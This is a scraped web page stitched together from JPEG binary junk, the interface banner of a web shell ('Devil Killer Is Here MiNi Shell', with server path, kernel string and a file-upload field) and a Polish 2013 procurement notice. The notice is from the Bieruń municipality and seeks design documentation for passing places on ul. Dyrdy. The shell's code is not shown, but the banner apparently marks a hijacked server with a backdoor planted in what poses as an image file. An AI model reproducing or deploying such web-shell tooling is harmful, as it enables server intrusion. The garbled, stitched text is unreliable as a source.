JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302310-N-2013.html

<p class="kh_header"><b>Bieruń: Opracowanie dokumentacji projektowej 
budowy mijanek przy ul. Dyrdy w Bieruniu</b><br>
<b>Numer ogłoszenia: 302310 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej 
budowy mijanek przy ul. Dyrdy w Bieruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej budowy dwóch mijanek (ok. 100 m2 każda) w ciągu drogi gminnej ul. Dyrdy w Bieruniu, w celu uzyskania decyzji o pozwoleniu na budowę. Należy wykonać projekty budowlane i wykonawcze.
Lokalizację mijanek należy uzgodnić z zamawiającym.

Kod Wspólnego Słownika Zamówień CPV:
71320000-7 Usługi inżynieryjne w zakresie projektowania.
1.	Charakterystyka terenu.

Nawierzchnia ulicy Dyrdy została wyremontowana w roku 2011, po budowie kanalizacji sanitarnej, ze środków na usuwanie skutków powodzi, jaka dotknęła Bieruń w 2010 roku.
Dla danego terenu istnieje aktualny plan zagospodarowania przestrzennego.

2.  Zakres prac.

Projekt będzie obejmował zakresem budowę dwóch mijanek w dwóch lokalizacjach.
Wykonawca w pierwszej kolejności wykona i przedstawi zamawiającemu do zaopiniowania koncepcję lokalizacji mijanek. Koncepcja musi być opracowana na aktualnych podkładach mapowych z nakładką ewidencyjną.
Zakres zadania obejmuje w szczególności:
1.	Wykonanie dokumentacji fotograficznej terenu objętego zadaniem.
2.	Inwentaryzację zieleni (wg potrzeb).
3.	Uzyskanie map do celów projektowych.
	Dokumentację projektową należy opracować na aktualnych podkładach mapowych z nakładką 	ewidencyjną i uzbrojenia terenu.
	Wykonawca musi uzyskać mapy sytuacyjno-wysokościowe zgodne ze stanem faktycznym 
	w terenie, w tym celu należy m.in.:
	-	przeprowadzić wywiad terenowy,
	-	wykonać pomiary terenowe mające na celu aktualizację istniejącej mapy zasadniczej, 
		w tym zaznaczenie wszelkich obiektów budowlanych, usytuowania zieleni, pomiary 			urządzeń podziemnych, o których nikt wcześniej nie wiedział, odszukanie punktów 			granicznych, uzgodnienie map w instytucjach branżowych.
4.	Uzyskanie wypisów i wyrysów z ewidencji gruntów (aktualny stan ewidencji gruntów 
	i budynków).
5.	Sporządzenie koncepcji układu mijanek wraz z zorganizowaniem i przeprowadzeniem w imieniu zamawiającego konsultacji społecznych, celem wyboru i akceptacji przyjętych założeń przez zamawiającego.
6.	Wykonanie projektów budowlanych i wykonawczych (na podstawie wybranego wariantu koncepcji układu mijanek), które powinny zawierać w szczególności:
	-	szczegółowy opis techniczny,
	-	niezbędne analizy i obliczenia,
	-	dokładny opis stosowanych materiałów i urządzeń,
	-	informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ), 
	-	część rysunkową.
	W szczególności należy opracować: 	
	- 	projekt drogowy,
	-	uzgodniony i zatwierdzony projekt docelowej organizacji ruchu, 
	- 	uzgodniony i zatwierdzony projekt organizacji ruchu na czas wykonywania robót,
	-	inne projekty branżowe wynikające z konieczności likwidacji kolizji z istniejącym 
           uzbrojeniem, uwzględniające konieczność przełożenia, zabezpieczenia lub wymiany 
           istniejącego uzbrojenia.	
7.	Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych.
8.	Wykonanie przedmiarów robót.
9.	Wykonanie kosztorysów inwestorskich  i zbiorczego zestawienia 	kosztów.
10.  Wykonanie projektu podziału działek pod projektowane mijanki oraz uzyskanie decyzji 
       zatwierdzającej projekt.
11.	Wszelkie konieczne do realizacji zamówienia (zgodnie z ustawą Pzp) oraz rzeczowego 
       wykonania inwestycji wywiady środowiskowe, uzgodnienia, opinie, zgody, zatwierdzenia, 
       decyzje, pozwolenia, postanowienia, informacje, sprawdzenia, zgłoszenia itp.
12.  Wykonawca zobowiązany będzie do: 
-	świadczenia usług z należytą starannością, zgodnie z najlepszymi praktykami stosowanymi przy projektowaniu;
-	zapewnienia kompetentnego personelu do realizacji zamówienia, który będzie współpracował  z osobami wskazanymi przez zamawiającego;
-	uzgadniania harmonogramu prac z zamawiającym;
-	współdziałania z zamawiającym przy realizacji dokumentacji projektowej oraz
do uczestnictwa w spotkaniach roboczych i konsultacjach; 
-	udzielania wyjaśnień na pisemne zapytania zamawiającego lub wykonawcy robót budowlanych w trakcie prowadzenia postępowania o udzielenie zamówienia publicznego 
na zaprojektowane roboty budowlane (bez dodatkowego wynagrodzenia) w terminach umożliwiających  zamawiającemu sprawne przeprowadzenie takiego postępowania.

3.  Przepisy

Dokumentacja projektowo- kosztorysowa musi być opracowana zgodnie z:
Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U.113.2010.759
z późniejszymi zmianami), a w szczególności art.29 ust.3 Przedmiotu zamówienia nie wolno
opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to
uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia
za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy
lub równoważny oraz aktami wykonawczymi do tej ustawy,
	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego
zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót
budowlanych oraz programu funkcjonalno-użytkowego (Dz.U.202.2004.2072 z późn. zm.),
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod
i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac
projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-
użytkowym (Dz. U. 130. 2004.1389),
Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U.243.2010.1623)
oraz zgodnie z aktami wykonawczymi do tej Ustawy, a w szczególności:
Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji
dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia
(Dz.U.120.2003.1126),
Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U.92.2004.881) oraz aktami
wykonawczymi do tej ustawy,
Rozporządzeniem MSW i A z 05.98.1998 r. w sprawie aprobat i kryteriów technicznych oraz
jednostkowego stosowania wyrobów budowlanych (Dz.U.107.1998.679 z późn. zm.),
Ustawa z dnia 27.03.2003 r. O planowaniu i zagospodarowaniu przestrzennym
(Dz.U.80.2003.717 z poźn. zmianami),
	Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 30.05.2000 r. w sprawie
warunków technicznych, jakim powinny odpowiadać drogowe  obiekty inżynierskie i ich usytuowanie
(Dz.U.63.2000.735 z poźn. zmianami),
	Ustawą z 21.03.1985 r. o drogach publicznych (Dz.U.19.2007.115 z późn. zm.),
	Ustawą Prawo wodne ( Dz.U.239.2005.2019 tekst jednolity),
Ustawą O Ochronie przyrody (Dz.U.92.2004.880 z póżn. zm.),
	Ustawą Prawo ochrony środowiska (Dz.U. 25.2008.150 tekst jednolity),
	Rozporządzeniem Rady Ministrów z dnia 09.11.2004 r. w sprawie określenia rodzajów
przedsięwzięć mogących znacznie oddziaływać na środowisko oraz szczegółowych
uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu
o oddziaływaniu na środowisko (Dz.U.257.2004.2573 z późn. zm.),
	Ustawą z dnia 09.06.2011 r. Prawo geologiczne i górnicze (Dz.U.163.2011.981),
Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowych
warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz.U.220.2003.2181),
	Rozporządzeniem Ministra Środowiska w sprawie dokumentacji hydrogeologicznej i dokumentacji geologiczno-inżynierskiej (Dz.U. 291.2011.1714)
Ustawą Prawo geodezyjne i kartograficzne ( Dz.U.240.2005.2027 tekst jednolity),
	Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02.1995 r.
w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności   
geodezyjnych obowiązujących w budownictwie ( Dz.U. 25.1995.133),
	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji oraz Rolnictwa i Gospodarki
Żywnościowej w sprawie rozgraniczania nieruchomości (Dz.U.45.1999.453) oraz innymi obowiązującymi przepisami prawa (w tym: ochrony ppoż., bhp, san-epid, ochrony środowiska),przepisami techniczno-budowlanymi , normami, katalogami, wytycznymi, instrukcjami. 
4.  Uwagi końcowe

1) Opracowana dokumentacja projektowo-kosztorysowa powinna być wykonana w stanie kompletnym.
Powinna zawierać wszystkie materiały geodezyjne, prawne, potwierdzone wnioski o wydanie decyzji i dokumentów), uzyskane uzgodnienia, opinie, inne dokumenty.
Dokumentacja musi być zaopatrzona w oświadczenie o kompletności.
Dokumentacja musi spełniać wszystkie wymogi konieczne do uzyskania decyzji 
o pozwoleniu na budowę. Powinna uwzględnić uzyskanie wszelkich koniecznych uzgodnień, pozwoleń i decyzji administracyjnych dla realizacji w/w projektu. 
Przedmiary robót oraz kosztorys inwestorski powinny obejmować wszystkie konieczne roboty związane z realizacją zadania.
Projekty budowlano-wykonawcze, przedmiary oraz specyfikacje techniczne wykonania i odbioru robót należy wykonać:
- w wersji papierowej w 4 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach (na płycie CD - w PDF); 
  a przedmiary robót w wersji PDF oraz w wersji umożliwiającej jego przetwarzanie np. ATH, KST, 
       XLS.
Kosztorys inwestorski należy wykonać:
- w wersji papierowej w 2 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach w wersji umożliwiającej jego przetwarzanie np. 
   ATH, KST, XLS.
2) Przyjęte w trakcie projektowania rozwiązania technologiczne i materiały należy konsultować 
z zamawiającym oraz uzyskać jego akceptację.
3) Dokumentacja projektowo-kosztorysowa będzie służyć jako opis przedmiotu zamówienia do przetargu - zgodnie z ustawą Prawo zamówień publicznych - na wyłonienie wykonawcy robót budowlanych oraz realizację robót na jej podstawie. 
Dokumentacja w swojej treści powinna określać parametry techniczne zastosowanych materiałów, urządzeń i wyposażenia oraz technologię robót w taki sposób aby nie utrudniać uczciwej konkurencji.
Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń
za pomocą parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących
na producenta.
4) Zamawiający nie przewiduje udzielania zamówień uzupełniających, dynamicznego systemu zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania  zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust.4 
ustawy pzp.
5) Zamawiający nie dopuszcza składania ofert częściowych, wariantowych.
6) Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący
załącznik do SIWZ.
7) Do obowiązków wykonawcy, w ramach wykonania przedmiotu zamówienia, będzie też
należał udział w procedurze wyboru wykonawcy robót budowlanych w zakresie udzielania
odpowiedzi na zapytania dot. rozwiązań zawartych w dokumentacji projektowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zasady wnoszenia wadium

Wadium w wysokości  500,00 zł (słownie: pięćset złotych) musi być wniesione w terminie, który został podany w SIWZ punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem tzn. przelać z rachunku bankowego wykonawcy na rachunek bankowy zamawiającego w BS O/Tychy numer konta: 26 8435 0004 0000 0000 6158 0001 z adnotacją:
Wadium - Przetarg nieograniczony na wybór wykonawcy zamówienia pn. Opracowanie dokumentacji projektowej budowy mijanek przy  ul. Dyrdy w Bieruniu.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu            ( I piętro, pokój nr 8, segment B) nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert. W przypadku wniesienia wadium w formie pieniężnej i braku wskazania w formularzu ofertowym nr konta na które należy zwrócić wadium, zamawiający zwróci je na rachunek z którego zostało wniesione. 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. (Dz.U.2007.42.275 z późniejszymi zmianami) o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz 
z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się o udzielenie nin. zamówienia, należy informacyjnie wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.

2. Zasady zwrotu wadium

Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy pzp.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.
3. Utrata wadium

Zgodnie z zastrzeżeniem art. 46 ust. 4a ustawy pzp zamawiający zatrzymuje wadium wraz 
z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art. 46 ust. 5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.                                                                                                        Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
 - oświadczenia (zgodnie z art. 22 ust.1 pkt. 1 ustawy pzp). 
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy   
 wykazać, że warunek spełnia jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie:
 Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; co najmniej jedną dokumentację techniczną budowy lub przebudowy drogi publicznej bądź parkingu o powierzchni min. 500 m2.
 Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie  
 przedłożonych w ofercie: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ) ,
-   dokumentu: wykazu wykonanych usług ( co najmniej jednej dokumentacji  technicznej budowy 
     lub przebudowy drogi publicznej bądź parkingu o powierzchni min. 500 m2)) 
     wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały 
     wykonane z  załączeniem  dowodów, czy zostały wykonane należycie.
Dowodami są:
1.	poświadczenie,
2.	inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie wykazać poświadczenia, o którym mowa wyżej.
       W przypadku gdy zamawiający jest podmiotem, na rzecz którego zostały wykonane roboty wskazane w wykazie robót budowlanych wykonawca nie ma obowiązku przedkładania dowodów,   o których mowa wyżej.
W postępowaniach wszczynanych w okresie do 20.02.2014 r., wykonawca w miejsce poświadczeń może przedkładać dokumenty potwierdzające należyte wykonanie (np. referencje, protokoły odbioru końcowego, określone w § 1 ust.1 pkt 2 i 3 Rozporządzenia Prezesa rady Ministrów z dnia 30 grudnia 2009 roku w sprawie dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane - Dz. U.nr 226 poz.1817). 	
    Przy ocenie spełnienia warunku za wykonane, zamawiający uzna te opracowania ,które zostały 
wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
prowadzenia działalności jest krótszy - w tym okresie.
  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena oferty     
nastąpi łącznie tzn. należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców                                                                                                                                                                                                
w całej rozciągłości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
Dysponują osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń 
w specjalności drogowej, a w przedmiotowym zamówieniu będzie uczestniczyć w wykonaniu
zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp),
-   dokumentu: wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia, 
    w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami   
    na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia , a także zakresu 
    wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi 
    osobami. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:         
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie       przedłożonego przez wykonawcę:
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

